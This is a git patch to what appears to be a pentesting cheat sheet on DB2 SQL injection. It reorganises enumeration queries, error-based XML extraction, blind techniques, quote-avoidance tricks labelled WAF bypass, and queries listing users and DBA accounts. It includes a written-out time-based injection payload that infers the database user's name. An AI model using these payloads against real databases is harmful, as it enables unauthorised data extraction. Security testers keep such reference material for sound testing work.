From b98f8ca5871b2f439f6186df21d5a623921eedbe Mon Sep 17 00:00:00 2001
From: Swissky <12152583+swisskyrepo@users.noreply.github.com>
Date: Sun, 17 Nov 2024 18:37:07 +0100
Subject: [PATCH] DB2 Injection updates
---
SQL Injection/DB2 Injection.md | 266 ++++++++++++--------------------
1 file changed, 95 insertions(+), 171 deletions(-)
diff --git a/SQL Injection/DB2 Injection.md b/SQL Injection/DB2 Injection.md
index 75e9484..abcf578 100644
--- a/SQL Injection/DB2 Injection.md
+++ b/SQL Injection/DB2 Injection.md
@@ -5,203 +5,127 @@ ## Summary
-* [DB2 Cheatsheet](#db2-cheatsheet)
+* [DB2 Comments](#db2-comments)
+* [DB2 Default Databases](#db2-default-databases)
+* [DB2 Enumeration](#db2-enumeration)
+* [DB2 Methodology](#db2-methodology)
+* [DB2 Error Based](#db2-error-based)
+* [DB2 Blind Based](#db2-blind-based)
+* [DB2 Time Based](#db2-time-based)
+* [DB2 WAF Bypass](#db2-waf-bypass)
+* [DB2 Accounts and Privileges](#db2-accounts-and-privileges)
* [References](#references)
-## DB2 Cheatsheet
+## DB2 Comments
-### Version
+| Type | Description |
+| -------------------------- | --------------------------------- |
+| `--` | SQL comment |
+
+
+## DB2 Default Databases
+
+| Name | Description |
+| ----------- | --------------------------------------------------------------------- |
+| SYSIBM | Core system catalog tables storing metadata for database objects. |
+| SYSCAT | User-friendly views for accessing metadata in the SYSIBM tables. |
+| SYSSTAT | Statistics tables used by the DB2 optimizer for query optimization. |
+| SYSPUBLIC | Metadata about objects available to all users (granted to PUBLIC). |
+| SYSIBMADM | Administrative views for monitoring and managing the database system. |
+| SYSTOOLs | Tools, utilities, and auxiliary objects provided for database administration and troubleshooting. |
+
+
+## DB2 Enumeration
+
+| Description | SQL Query |
+| ---------------- | ----------------------------------------- |
+| DBMS version | `select versionnumber, version_timestamp from sysibm.sysversions;` |
+| DBMS version | `select service_level from table(sysproc.env_get_inst_info()) as instanceinfo` |
+| DBMS version | `select getvariable('sysibm.version') from sysibm.sysdummy1` |
+| DBMS version | `select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo` |
+| DBMS version | `select service_level,bld_level from sysibmadm.env_inst_info` |
+| Current user | `select user from sysibm.sysdummy1` |
+| Current user | `select session_user from sysibm.sysdummy1` |
+| Current user | `select system_user from sysibm.sysdummy1` |
+| Current database | `select current server from sysibm.sysdummy1` |
+| OS info | `select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info` |
+
+
+## DB2 Methodology
+
+
+| Description | SQL Query |
+| ---------------- | ------------------------------------ |
+| List databases | `SELECT distinct(table_catalog) FROM sysibm.tables` |
+| List databases | `SELECT schemaname FROM syscat.schemata;` |
+| List columns | `SELECT name, tbname, coltype FROM sysibm.syscolumns` |
+| List tables | `SELECT table_name FROM sysibm.tables` |
+| List tables | `SELECT name FROM sysibm.systables` |
+| List tables | `SELECT tbname FROM sysibm.syscolumns WHERE name='username'` |
+
+
+## DB2 Error Based
```sql
-select versionnumber, version_timestamp from sysibm.sysversions;
-select service_level from table(sysproc.env_get_inst_info()) as instanceinfo
-select getvariable('sysibm.version') from sysibm.sysdummy1 -- (v8+)
-select prod_release,installed_prod_fullname from table(sysproc.env_get_prod_info()) as productinfo
-select service_level,bld_level from sysibmadm.env_inst_info
-```
+-- Returns all in one xml-formatted string
+select xmlagg(xmlrow(table_schema)) from sysibm.tables
-### Comments
+-- Same but without repeated elements
+select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables)
-```sql
-select blah from foo -- comment like this (double dash)
-```
-
-### Current User
-
-```sql
-select user from sysibm.sysdummy1
-select session_user from sysibm.sysdummy1
-select system_user from sysibm.sysdummy1
-```
-
-### List Users
-
-DB2 uses OS accounts
-
-```sql
-select distinct(authid) from sysibmadm.privileges -- priv required
-select grantee from syscat.dbauth -- incomplete results
-select distinct(definer) from syscat.schemata -- more accurate
-select distinct(grantee) from sysibm.systabauth -- same as previous
-```
-
-### List Privileges
-
-```sql
-select * from syscat.tabauth -- shows priv on tables
-select * from syscat.tabauth where grantee = current user -- shows privs for current user
-select * from syscat.dbauth where grantee = current user;;
-select * from SYSIBM.SYSUSERAUTH — List db2 system privilegies
-```
-
-### List DBA Accounts
-
-```sql
-select distinct(grantee) from sysibm.systabauth where CONTROLAUTH='Y'
-select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = ‘Y’ or SYSADMAUTH = ‘G’
-```
-
-### Current Database
-
-```sql
-select current server from sysibm.sysdummy1
-```
-
-### List Databases
-
-```sql
-select distinct(table_catalog) from sysibm.tables
-SELECT schemaname FROM syscat.schemata;
-```
-
-### List Columns
-
-```sql
-select name, tbname, coltype from sysibm.syscolumns -- also valid syscat and sysstat
-```
-
-### List Tables
-
-```sql
-select table_name from sysibm.tables
-select name from sysibm.systables
-```
-
-### Find Tables From Column Name
-
-```sql
-select tbname from sysibm.syscolumns where name='username'
-```
-
-### Select Nth Row
-
-```sql
-select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only
-```
-
-### Select Nth Char
-
-```sql
-select substr('abc',2,1) FROM sysibm.sysdummy1 -- returns b
-```
-
-### Bitwise AND/OR/NOT/XOR
-
-```sql
-select bitand(1,0) from sysibm.sysdummy1 -- returns 0. Also available bitandnot, bitor, bitxor, bitnot
-```
-
-### ASCII Value
-
-```sql
-Char select chr(65) from sysibm.sysdummy1 -- returns 'A'
-```
-
-### Char -> ASCII Value
-
-```sql
-select ascii('A') from sysibm.sysdummy1 -- returns 65
-```
-
-### Casting
-
-```sql
-select cast('123' as integer) from sysibm.sysdummy1
-select cast(1 as char) from sysibm.sysdummy1
-```
-
-### String Concat
-
-```sql
-select 'a' concat 'b' concat 'c' from sysibm.sysdummy1 -- returns 'abc'
-select 'a' || 'b' from sysibm.sysdummy1 -- returns 'ab'
+-- Returns all in one xml-formatted string.
+-- May need CAST(xml2clob(… AS varchar(500)) to display the result.
+select xml2clob(xmelement(name t, table_schema)) from sysibm.tables
```
-### IF Statement
-Seems only allowed in stored procedures. Use case logic instead.
+## DB2 Blind Based
-### Case Statement
-
-```sql
-select CASE WHEN (1=1) THEN 'AAAAAAAAAA' ELSE 'BBBBBBBBBB' END from sysibm.sysdummy1
-```
+| Description | SQL Query |
+| ---------------- | ------------------------------------------ |
+| Substring | `select substr('abc',2,1) FROM sysibm.sysdummy1` |
+| ASCII value | `select chr(65) from sysibm.sysdummy1` |
+| CHAR to ASCII | `select ascii('A') from sysibm.sysdummy1` |
+| Select Nth Row | `select name from (select * from sysibm.systables order by name asc fetch first N rows only) order by name desc fetch first row only` |
+| Bitwise AND | `select bitand(1,0) from sysibm.sysdummy1` |
+| Bitwise AND NOT | `select bitandnot(1,0) from sysibm.sysdummy1` |
+| Bitwise OR | `select bitor(1,0) from sysibm.sysdummy1` |
+| Bitwise XOR | `select bitxor(1,0) from sysibm.sysdummy1` |
+| Bitwise NOT | `select bitnot(1,0) from sysibm.sysdummy1` |
-### Avoiding Quotes
+## DB2 Time Based
-```sql
-SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1 -- returns “ADRI”. Works without select too
-```
+Heavy queries, if user starts with ascii 68 ('D'), the heavy query will be executed, delaying the response.
-### Time Delay
-
-Heavy queries, for example: If user starts with ascii 68 ('D'), the heavy query will be executed, delaying the response.
-However, if user doesn't start with ascii 68, the heavy query won't execute and thus the response will be faster.
```sql
' and (SELECT count(*) from sysibm.columns t1, sysibm.columns t2, sysibm.columns t3)>0 and (select ascii(substr(user,1,1)) from sysibm.sysdummy1)=68
```
-### Serialize to XML (for error based)
+
+## DB2 WAF Bypass
+
+### Avoiding Quotes
```sql
-select xmlagg(xmlrow(table_schema)) from sysibm.tables -- returns all in one xml-formatted string
-select xmlagg(xmlrow(table_schema)) from (select distinct(table_schema) from sysibm.tables) -- Same but without repeated elements
-select xml2clob(xmelement(name t, table_schema)) from sysibm.tables -- returns all in one xml-formatted string (v8). May need CAST(xml2clob(… AS varchar(500)) to display the result.
+SELECT chr(65)||chr(68)||chr(82)||chr(73) FROM sysibm.sysdummy1
```
-### Command Execution and Local File Access
-Seems it's only allowed from procedures or UDFs.
+## DB2 Accounts and Privileges
-### Hostname/IP and OS INFO
-
-```sql
-select os_name,os_version,os_release,host_name from sysibmadm.env_sys_info -- requires priv
-```
-
-### Location of DB Files
-
-```sql
-select * from sysibmadm.reg_variables where reg_var_name='DB2PATH' -- requires priv
-```
-
-### System Config
-
-```sql
-select dbpartitionnum, name, value from sysibmadm.dbcfg where name like 'auto_%' -- Requires priv. Retrieve the automatic maintenance settings in the database configuration that are stored in memory for all database partitions.
-select name, deferred_value, dbpartitionnum from sysibmadm.dbcfg -- Requires priv. Retrieve all the database configuration parameters values stored on disk for all database partitions.
-```
-
-### Default System Database
-
-* SYSIBM
-* SYSCAT
-* SYSSTAT
-* SYSPUBLIC
-* SYSIBMADM
-* SYSTOOLs
+| Description | SQL Query |
+| ---------------- | ------------------------------------ |
+| List users | `select distinct(grantee) from sysibm.systabauth` |
+| List users | `select distinct(definer) from syscat.schemata` |
+| List users | `select distinct(authid) from sysibmadm.privileges` |
+| List users | `select grantee from syscat.dbauth` |
+| List privileges | `select * from syscat.tabauth` |
+| List privileges | `select * from SYSIBM.SYSUSERAUTH — List db2 system privilegies` |
+| List DBA accounts | `select distinct(grantee) from sysibm.systabauth where CONTROLAUTH='Y'` |
+| List DBA accounts | `select name from SYSIBM.SYSUSERAUTH where SYSADMAUTH = 'Y' or SYSADMAUTH = 'G'` |
+| Location of DB files | `select * from sysibmadm.reg_variables where reg_var_name='DB2PATH'` |
## References